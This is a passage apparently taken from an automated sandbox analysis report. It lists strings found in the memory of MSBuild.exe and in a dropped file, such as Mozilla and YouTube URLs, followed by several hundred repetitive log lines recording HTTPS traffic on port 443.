Source: MSBuild.exe, 00000001.00000002.2478563220.00000000004B3000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2485877933.0000000017A9A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2478563220.000000000048F000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: IJKJDA.1.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: MSBuild.exe, 00000001.00000002.2478563220.000000000048F000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: IJKJDA.1.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: MSBuild.exe, 00000001.00000002.2485877933.0000000017A9A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2478563220.000000000048F000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: MSBuild.exe, 00000001.00000002.2478563220.000000000048F000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: IJKJDA.1.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 57141 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57084 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57187 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57164 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57061 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57126
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57247
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57127
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57248
Source: unknown Network traffic detected: HTTP traffic on port 57106 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57128
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57249
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57129
Source: unknown Network traffic detected: HTTP traffic on port 57129 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57133
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57254
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57134
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57255
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57135
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57256
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57136
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57257
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57250
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57130
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57251
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57131
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57252
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57132
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57253
Source: unknown Network traffic detected: HTTP traffic on port 57209 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57117 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57037 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57255 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57198 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57016
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57137
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57258
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57138
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57259
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57139
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57019
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57023
Source: unknown Network traffic detected: HTTP traffic on port 57095 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57144
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57265
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57024
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57145
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57266
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57025
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57146
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57267
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57026
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57147
Source: unknown Network traffic detected: HTTP traffic on port 57152 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57268
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57140
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57261
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57141
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57262
Source: unknown Network traffic detected: HTTP traffic on port 57026 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57021
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57142
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57263
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57022
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57143
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57264
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57260
Source: unknown Network traffic detected: HTTP traffic on port 57244 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57279 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57027
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57148
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57269
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57028
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57149
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57029
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57034
Source: unknown Network traffic detected: HTTP traffic on port 57130 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57155
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57276
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57035
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57156
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57277
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57036
Source: unknown Network traffic detected: HTTP traffic on port 57096 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57157
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57278
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57037
Source: unknown Network traffic detected: HTTP traffic on port 57153 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57158
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57279
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57030
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57151
Source: unknown Network traffic detected: HTTP traffic on port 57210 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57272
Source: unknown Network traffic detected: HTTP traffic on port 57048 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57031
Source: unknown Network traffic detected: HTTP traffic on port 57025 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57073 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57152
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57273
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57032
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57153
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57274
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57033
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57154
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57275
Source: unknown Network traffic detected: HTTP traffic on port 57243 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57266 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57270
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57150
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57271
Source: unknown Network traffic detected: HTTP traffic on port 57186 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57062 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57232 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57038
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57159
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57039
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57045
Source: unknown Network traffic detected: HTTP traffic on port 57105 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57166
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57287
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57046
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57167
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57047
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57048
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57169
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57041
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57162
Source: unknown Network traffic detected: HTTP traffic on port 57175 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57283
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57163
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57042
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57284
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57043
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57164
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57285
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57044
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57165
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57286
Source: unknown Network traffic detected: HTTP traffic on port 57280 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57280
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57160
Source: unknown Network traffic detected: HTTP traffic on port 57221 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57281
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57161
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57040
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57282
Source: unknown Network traffic detected: HTTP traffic on port 57139 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57036 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57207
Source: unknown Network traffic detected: HTTP traffic on port 57197 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57208
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57209
Source: unknown Network traffic detected: HTTP traffic on port 57277 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57203
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57204
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57205
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57206
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57210
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57211
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57212
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57213
Source: unknown Network traffic detected: HTTP traffic on port 57174 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57268 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57151 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57222 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57245 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57085 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57163 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57218
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57219
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57214
Source: unknown Network traffic detected: HTTP traffic on port 57234 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57107 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57215
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57216
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57217
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57100
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57221
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57101
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57222
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57102
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57223
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57103
Source: unknown Network traffic detected: HTTP traffic on port 57128 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57224
Source: unknown Network traffic detected: HTTP traffic on port 57074 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57047 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57220
Source: unknown Network traffic detected: HTTP traffic on port 57200 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57118 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57063 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57185 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57108
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57229
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57109
Source: unknown Network traffic detected: HTTP traffic on port 57256 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57162 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57086 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57104
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57225
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57105
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57226
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57106
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57227
Source: unknown Network traffic detected: HTTP traffic on port 57233 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57107
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57228
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57111
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57232
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57112
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57233
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57113
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57234
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57114
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57235
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57230
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57110
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57231
Source: unknown Network traffic detected: HTTP traffic on port 57035 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57119
Source: unknown Network traffic detected: HTTP traffic on port 57052 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57196 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57278 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57115
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57236
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57116
Source: unknown Network traffic detected: HTTP traffic on port 57140 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57237
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57117
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57238
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57118
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57239
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57122
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57243
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57123
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57244
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57124
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57245
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57125
Source: unknown Network traffic detected: HTTP traffic on port 57211 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57246
Source: unknown Network traffic detected: HTTP traffic on port 57024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57240
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57120
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57241
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57121
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57242
Source: unknown Network traffic detected: HTTP traffic on port 57267 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57097 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57126 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57103 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57046 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57023 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57287 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57096
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57097
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57098
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57099
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57092
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57093
Source: unknown Network traffic detected: HTTP traffic on port 57075 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57094
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57095
Source: unknown Network traffic detected: HTTP traffic on port 57098 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57241 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57264 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57090
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57091
Source: unknown Network traffic detected: HTTP traffic on port 57276 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57138 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57064 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57184 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57230 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57149 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57206 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57114 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57034 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57195 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57053 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57252 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57127 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57207 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57218 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57087 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57161 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57102 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57045 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57076 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57150 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57229 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57263 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57116 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57088 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57160 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57231 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57065 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57049
Source: unknown Network traffic detected: HTTP traffic on port 57254 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57219 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57056
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57177
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57057
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57178
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57058
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57179
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57059
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57052
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57173
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57053
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57174
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57054
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57175
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57055
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57176
Source: unknown Network traffic detected: HTTP traffic on port 57159 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57170
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57050
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57171
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57051
Source: unknown Network traffic detected: HTTP traffic on port 57136 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57172
Source: unknown Network traffic detected: HTTP traffic on port 57033 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57054 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57194 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57125 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57104 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57067
Source: unknown Network traffic detected: HTTP traffic on port 57022 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57188
Source: unknown Network traffic detected: HTTP traffic on port 57286 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57068
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57189
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57069
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57063
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57184
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57064
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57185
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57065
Source: unknown Network traffic detected: HTTP traffic on port 57183 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57186
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57066
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57187
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57180
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57060
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57181
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57061
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57182
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57062
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57183
Source: unknown Network traffic detected: HTTP traffic on port 57265 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57099 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57275 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57078
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57199
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57079
Source: unknown Network traffic detected: HTTP traffic on port 57021 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57195
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57074
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57075
Source: unknown Network traffic detected: HTTP traffic on port 57182 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57196
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57076
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57197
Source: unknown Network traffic detected: HTTP traffic on port 57044 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57077
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57198
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57070
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57191
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57071
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57192
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57072
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57193
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57073
Source: unknown Network traffic detected: HTTP traffic on port 57077 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57194
Source: unknown Network traffic detected: HTTP traffic on port 57220 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57115 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57190
Source: unknown Network traffic detected: HTTP traffic on port 57148 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57066 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57253 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57089
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57085
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57086
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57087
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57088
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57081
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57082
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57083
Source: unknown Network traffic detected: HTTP traffic on port 57137 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57084
Source: unknown Network traffic detected: HTTP traffic on port 57208 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57242 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57080
Source: unknown Network traffic detected: HTTP traffic on port 57250 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57273 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57055 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57032 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57193 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57215 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57238 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57090 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57203 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57089 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57100 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57146 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57043 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57135 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57078 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57227 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57261 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57147 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57124 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57285 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57067 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57111 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57226 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57249 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57274 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57031 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57056 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57192 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57169 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57181 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57158 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57204 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57080 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57145 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57122 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57180 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57042 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57205 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57079 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57283 -> 443
